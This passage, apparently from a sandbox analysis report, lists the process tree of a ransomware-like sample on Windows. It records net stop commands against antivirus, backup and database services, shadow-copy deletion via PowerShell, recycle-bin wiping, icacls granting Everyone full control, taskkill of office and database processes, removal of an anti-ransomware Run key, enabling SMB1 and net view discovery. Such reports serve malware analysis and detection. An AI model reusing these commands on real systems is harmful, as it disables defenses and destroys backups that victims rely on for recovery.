  2⤵
  PID:4484
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c rd /s /q D:\\$Recycle.bin
  2⤵
  PID:4136
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop EPUpdateService /y
    3⤵
    PID:14552
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
  2⤵
  PID:5092
- C:\Windows\SYSTEM32\net.exe
  "net.exe" start Dnscache /y
  2⤵
  PID:5300
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 start Dnscache /y
    3⤵
    PID:5828
- C:\Windows\SYSTEM32\net.exe
  "net.exe" start SSDPSRV /y
  2⤵
  PID:5332
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 start SSDPSRV /y
    3⤵
    PID:5900
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BMR Boot Service /y
  2⤵
  PID:5552
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop NetBackup BMR MTFTP Service /y
  2⤵
  PID:5592
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
    3⤵
    PID:5296
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop DefWatch /y
  2⤵
  PID:5628
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop DefWatch /y
    3⤵
    PID:4836
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop mfewc /y
  2⤵
  PID:5508
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfewc /y
    3⤵
    PID:6124
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop McAfeeDLPAgentService /y
  2⤵
  PID:5472
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
    3⤵
    PID:6040
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop avpsus /y
  2⤵
  PID:5420
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop avpsus /y
    3⤵
    PID:6020
- C:\Windows\SYSTEM32\net.exe
  "net.exe" start upnphost /y
  2⤵
  PID:5380
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 start upnphost /y
    3⤵
    PID:5868
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SSDPSRV start= auto
  2⤵
  PID:5260
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config Dnscache start= auto
  2⤵
  PID:5020
- C:\Windows\SYSTEM32\reg.exe
  "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
  2⤵
  PID:4764
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLSafeOLRService /y
    3⤵
    PID:14736
- C:\Windows\SYSTEM32\net.exe
  "net.exe" start FDResPub /y
  2⤵
  PID:5736
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 start FDResPub /y
    3⤵
    PID:5372
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" & Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
  2⤵
  - Drops file in Windows directory
  PID:5776
- - C:\Users\Admin\AppData\Local\Temp\8345FC71-2889-4118-9B53-FAC3CF09C7C9\dismhost.exe
    C:\Users\Admin\AppData\Local\Temp\8345FC71-2889-4118-9B53-FAC3CF09C7C9\dismhost.exe {B773951D-BC68-47D5-B692-40A3568515A1}
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in Windows directory
    PID:10156
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c net view
  2⤵
  PID:5804
- - C:\Windows\system32\net.exe
    net view
    3⤵
    - Discovers systems in the same network
    PID:12308
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ccEvtMgr /y
  2⤵
  PID:5880
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccEvtMgr /y
    3⤵
    PID:5564
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ccSetMgr /y
  2⤵
  PID:5948
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccSetMgr /y
    3⤵
    PID:2700
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SavRoam /y
  2⤵
  PID:6004
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop RTVscan /y
  2⤵
  PID:6064
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop RTVscan /y
    3⤵
    PID:6376
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop bedbg /y
  2⤵
  PID:5668
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop bedbg /y
    3⤵
    PID:4740
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBIDPService /y
  2⤵
  PID:5112
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBIDPService /y
    3⤵
    PID:6528
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$SQL_2008 /y
  2⤵
  PID:5200
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y
    3⤵
    PID:10520
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SDRSVC /y
  2⤵
  PID:4392
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SDRSVC /y
    3⤵
    PID:12348
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ESHASRV /y
  2⤵
  PID:5892
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ESHASRV /y
    3⤵
    PID:12364
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLWriter /y
  2⤵
  PID:6200
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLWriter /y
    3⤵
    PID:12684
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop McTaskManager /y
  2⤵
  PID:6804
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McTaskManager /y
    3⤵
    PID:14244
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop DCAgent /y
  2⤵
  PID:8896
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop DCAgent /y
    3⤵
    PID:16376
- C:\Windows\SYSTEM32\icacls.exe
  "icacls" "Z:*" /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:11580
- C:\Windows\SYSTEM32\icacls.exe
  "icacls" "D:*" /grant Everyone:F /T /C /Q
  2⤵
  PID:11572
- C:\Windows\SYSTEM32\icacls.exe
  "icacls" "C:*" /grant Everyone:F /T /C /Q
  2⤵
  PID:11564
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
  2⤵
  PID:11556
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM oracle.exe /f
  2⤵
  - Kills process with taskkill
  PID:11548
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /f
  2⤵
  - Kills process with taskkill
  PID:11540
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysql.exe /f
  2⤵
  - Kills process with taskkill
  PID:11532
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqld.exe /f
  2⤵
  - Kills process with taskkill
  PID:11524
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sql.exe /f
  2⤵
  - Kills process with taskkill
  PID:11516
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM 1cv8.exe /f
  2⤵
  - Kills process with taskkill
  PID:11508
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM rphost.exe /f
  2⤵
  - Kills process with taskkill
  PID:11500
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM rmngr.exe /f
  2⤵
  - Kills process with taskkill
  PID:11492
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ragent.exe /f
  2⤵
  - Kills process with taskkill
  PID:11484
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM synctime.exe /F
  2⤵
  - Kills process with taskkill
  PID:11476
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlservr.exe /F
  2⤵
  - Kills process with taskkill
  PID:11468
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlbrowser.exe /F
  2⤵
  - Kills process with taskkill
  PID:11460
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlagent.exe /F
  2⤵
  - Kills process with taskkill
  PID:11452
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM oracle.exe /F
  2⤵
  - Kills process with taskkill
  PID:11444
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ocssd.exe /F
  2⤵
  - Kills process with taskkill
  PID:11436
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ocautoupds.exe /F
  2⤵
  - Kills process with taskkill
  PID:11428
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld-opt.exe /F
  2⤵
  - Kills process with taskkill
  PID:11420
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM wordpad.exe /F
  2⤵
  - Kills process with taskkill
  PID:11412
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld-nt.exe /F
  2⤵
  - Kills process with taskkill
  PID:11404
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM winword.exe /F
  2⤵
  - Kills process with taskkill
  PID:11396
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  PID:11388
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM visio.exe /F
  2⤵
  - Kills process with taskkill
  PID:11380
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  PID:11372
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM powerpnt.exe /F
  2⤵
  - Kills process with taskkill
  PID:11364
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM msftesql.exe /F
  2⤵
  - Kills process with taskkill
  PID:11356
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM tmlisten.exe /F
  2⤵
  - Kills process with taskkill
  PID:11348
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM outlook.exe /F
  2⤵
  - Kills process with taskkill
  PID:11340
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM msaccess.exe /F
  2⤵
  - Kills process with taskkill
  PID:11332
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM PccNTMon.exe /F
  2⤵
  - Kills process with taskkill
  PID:11324
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM onenote.exe /F
  2⤵
  - Kills process with taskkill
  PID:11316
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM isqlplussvc.exe /F
  2⤵
  - Kills process with taskkill
  PID:11308
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM Ntrtscan.exe /F
  2⤵
  - Kills process with taskkill
  PID:11296
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  PID:11288
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM xfssvccon.exe /F
  2⤵
  - Kills process with taskkill
  PID:11276
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM dbsnmp.exe /F
  2⤵
  - Kills process with taskkill
  PID:11268
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" IM thunderbird.exe /F
  2⤵
  - Kills process with taskkill
  PID:9980
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM zoolz.exe /F
  2⤵
  - Kills process with taskkill
  PID:10568
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mbamtray.exe /F
  2⤵
  - Kills process with taskkill
  PID:10076
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM infopath.exe /F
  2⤵
  - Kills process with taskkill
  PID:10044
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ocomm.exe /F
  2⤵
  - Kills process with taskkill
  PID:4256
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM thebat64.exe /F
  2⤵
  - Kills process with taskkill
  PID:9956
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM dbeng50.exe /F
  2⤵
  - Kills process with taskkill
  PID:11260
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM tbirdconfig.exe /F
  2⤵
  - Kills process with taskkill
  PID:11252
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlwriter.exe /F
  2⤵
  - Kills process with taskkill
  PID:11244
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM CNTAoSMgr.exe /F
  2⤵
  - Kills process with taskkill
  PID:11236
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM excel.exe /F
  2⤵
  - Kills process with taskkill
  PID:11228
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM encsvc.exe /F
  2⤵
  - Kills process with taskkill
  PID:11216
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM steam.exe /F
  2⤵
  - Kills process with taskkill
  PID:11204
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM thebat.exe /F
  2⤵
  - Kills process with taskkill
  PID:11196
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM agntsvc.exe /F
  2⤵
  - Kills process with taskkill
  PID:11184
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM firefoxconfig.exe /F
  2⤵
  - Kills process with taskkill
  PID:11176
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqbcoreservice.exe /F
  2⤵
  - Kills process with taskkill
  PID:11164
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /F
  2⤵
  - Kills process with taskkill
  PID:11152
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  PID:11140
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  PID:11128
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  PID:11120
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamCatalogSvc /y
  2⤵
  PID:11108
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamCatalogSvc /y
    3⤵
    PID:5268
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop klnagent /y
  2⤵
  PID:11096
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop klnagent /y
    3⤵
    PID:5224
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLFDLauncher$SQL_2008 /y
  2⤵
  PID:11084
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y
    3⤵
    PID:5884
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamBrokerSvc /y
  2⤵
  PID:11072
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamBrokerSvc /y
    3⤵
    PID:17328
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop kavfsslp /y
  2⤵
  PID:11024
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop kavfsslp /y
    3⤵
    PID:11568
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLFDLauncher$SHAREPOINT /y
  2⤵
  PID:11012
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y
    3⤵
    PID:17312
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamBackupSvc /y
  2⤵
  PID:11000
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamBackupSvc /y
    3⤵
    PID:6044
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop KAVFSGT /y
  2⤵
  PID:10992
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop KAVFSGT /y
    3⤵
    PID:17320
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLFDLauncher$SBSMONITORING /y
  2⤵
  PID:10800
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y
    3⤵
    PID:4740
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBCFMonitorService /y
  2⤵
  PID:10360
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBCFMonitorService /y
    3⤵
    PID:15812
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecManagementService /y
  2⤵
  PID:10248
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecManagementService /y
    3⤵
    PID:16508
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecJobEngine /y
  2⤵
  PID:5008
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecJobEngine /y
    3⤵
    PID:17360
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecDiveciMediaService /y
  2⤵
  PID:5004
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
    3⤵
    PID:4168
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecAgentBrowser /y
  2⤵
  PID:8384
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
    3⤵
    PID:6136
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecAgentAccelerator /y
  2⤵
  PID:8344
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
    3⤵
    PID:3580
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecVSSProvider /y
  2⤵
  PID:8292
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecVSSProvider /y
    3⤵
    PID:16368
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop PDVFSService /y
  2⤵
  PID:8264
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop PDVFSService /y
    3⤵
    PID:6532
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop veeam /y
  2⤵
  PID:7356
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop veeam /y
    3⤵
    PID:6020
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamNFSSvc /y
  2⤵
  PID:7220
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamNFSSvc /y
    3⤵
    PID:5368
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamDeploymentService /y
  2⤵
  PID:8160
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamDeploymentService /y
    3⤵
    PID:6040
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamTransportSvc /y
  2⤵
  PID:8104
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamTransportSvc /y
    3⤵
    PID:16464
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VSNAPVSS /y
  2⤵
  PID:8036
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VSNAPVSS /y
    3⤵
    PID:16448
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop stc_raw_agent /y
  2⤵
  PID:7984
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop stc_raw_agent /y
    3⤵
    PID:17176
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop zhudongfangyu /y
  2⤵
  PID:7892
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop zhudongfangyu /y
    3⤵
    PID:16440
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$SHAREPOINT /y
  2⤵
  PID:8884
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y
    3⤵
    PID:16472
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecVSSProvider /y
  2⤵
  PID:8872
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecVSSProvider /y
    3⤵
    PID:16416
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AVP /y
  2⤵
  PID:8864
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AVP /y
    3⤵
    PID:16424
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$SBSMONITORING /y
  2⤵
  PID:8856
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y
    3⤵
    PID:16432
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$SBSMONITORING /
  2⤵
  PID:8848
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /
    3⤵
    PID:16360
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecRPCService /y
  2⤵
  PID:8840
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecRPCService /y
    3⤵
    PID:15328
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop Antivirus /y
  2⤵
  PID:8832
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop Antivirus /y
    3⤵
    PID:16392
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$PROFXENGAGEMENT /y
  2⤵
  PID:8820
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y
    3⤵
    PID:16336
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecManagementService /y
  2⤵
  PID:8812
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecManagementService /y
    3⤵
    PID:16496
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AcronisAgent /y
  2⤵
  PID:8800
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AcronisAgent /y
    3⤵
    PID:17392
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$PROD /y
  2⤵
  PID:8792
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$PROD /y
    3⤵
    PID:15316
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecJobEngine /y
  2⤵
  PID:8784
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecJobEngine /y
    3⤵
    PID:15300
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos Web Control Service” /y
  2⤵
  PID:8776
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos Web Control Service” /y
    3⤵
    PID:15872
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$PRACTTICEBGC /y
  2⤵
  PID:8768
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y
    3⤵
    PID:5336
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecDeviceMediaService /y
  2⤵
  PID:8756
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
    3⤵
    PID:17400
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos System Protection Service” /y
  2⤵
  PID:8748
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos System Protection Service” /y
    3⤵
    PID:15628
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$PRACTICEMGT /y
  2⤵
  PID:8736
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y
    3⤵
    PID:16488
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecAgentBrowser /y
  2⤵
  PID:8728
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
    3⤵
    PID:17384
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos Safestore Service” /y
  2⤵
  PID:8720
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos Safestore Service” /y
    3⤵
    PID:15292
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop audioendpointbuilder /y
  2⤵
  PID:8712
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop audioendpointbuilder /y
    3⤵
    PID:15836
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$ECWDB2 /y
  2⤵
  PID:8704
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y
    3⤵
    PID:5812
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecAgentAccelerator /y
  2⤵
  PID:8696
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
    3⤵
    PID:15308
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos Message Router” /y
  2⤵
  PID:8684
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos Message Router” /y
    3⤵
    PID:16344
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop unistoresvc_1af40a /y
  2⤵
  PID:8676
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop unistoresvc_1af40a /y
    3⤵
    PID:16400
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$BKUPEXEC /y
  2⤵
  PID:8664
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y
    3⤵
    PID:6024
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ARSM /y
  2⤵
  PID:8656
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ARSM /y
    3⤵
    PID:4848
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos MCS Client” /y
  2⤵
  PID:8648
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos MCS Client” /y
    3⤵
    PID:15856
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop msexchangeimap4 /y
  2⤵
  PID:8640
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop msexchangeimap4 /y
    3⤵
    PID:5652
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “intel(r) proset monitoring service” /y
  2⤵
  PID:8632
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y
    3⤵
    PID:15820
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSOLAP$TPSAMA /y
  2⤵
  PID:8620
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y
    3⤵
    PID:13240
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AcrSch2Svc /y
  2⤵
  PID:8612
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AcrSch2Svc /y
    3⤵
    PID:16408
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos MCS Agent” /y
  2⤵
  PID:8604
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos MCS Agent” /y
    3⤵
    PID:15828
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop msexchangeadtopology /y
  2⤵
  PID:8588
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop msexchangeadtopology /y
    3⤵
    PID:4884
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “aphidmonitorservice” /y
  2⤵
  PID:8580
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “aphidmonitorservice” /y
    3⤵
    PID:16520
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSOLAP$TPS /y
  2⤵
  PID:8568
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSOLAP$TPS /y
    3⤵
    PID:15848
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Zoolz 2 Service” /y
  2⤵
  PID:8560
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Zoolz 2 Service” /y
    3⤵
    PID:16480
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ReportServer$TPSAMA /y
  2⤵
  PID:8552
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ReportServer$TPSAMA /y
    3⤵
    PID:17168
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos Health Service” /y
  2⤵
  PID:8544
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos Health Service” /y
    3⤵
    PID:16976
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSExchangeSRS /y
  2⤵
  PID:8536
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSExchangeSRS /y
    3⤵
    PID:5348
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop W3Svc /y
  2⤵
  PID:8528
- - C:\Windows\system32\net1.exe
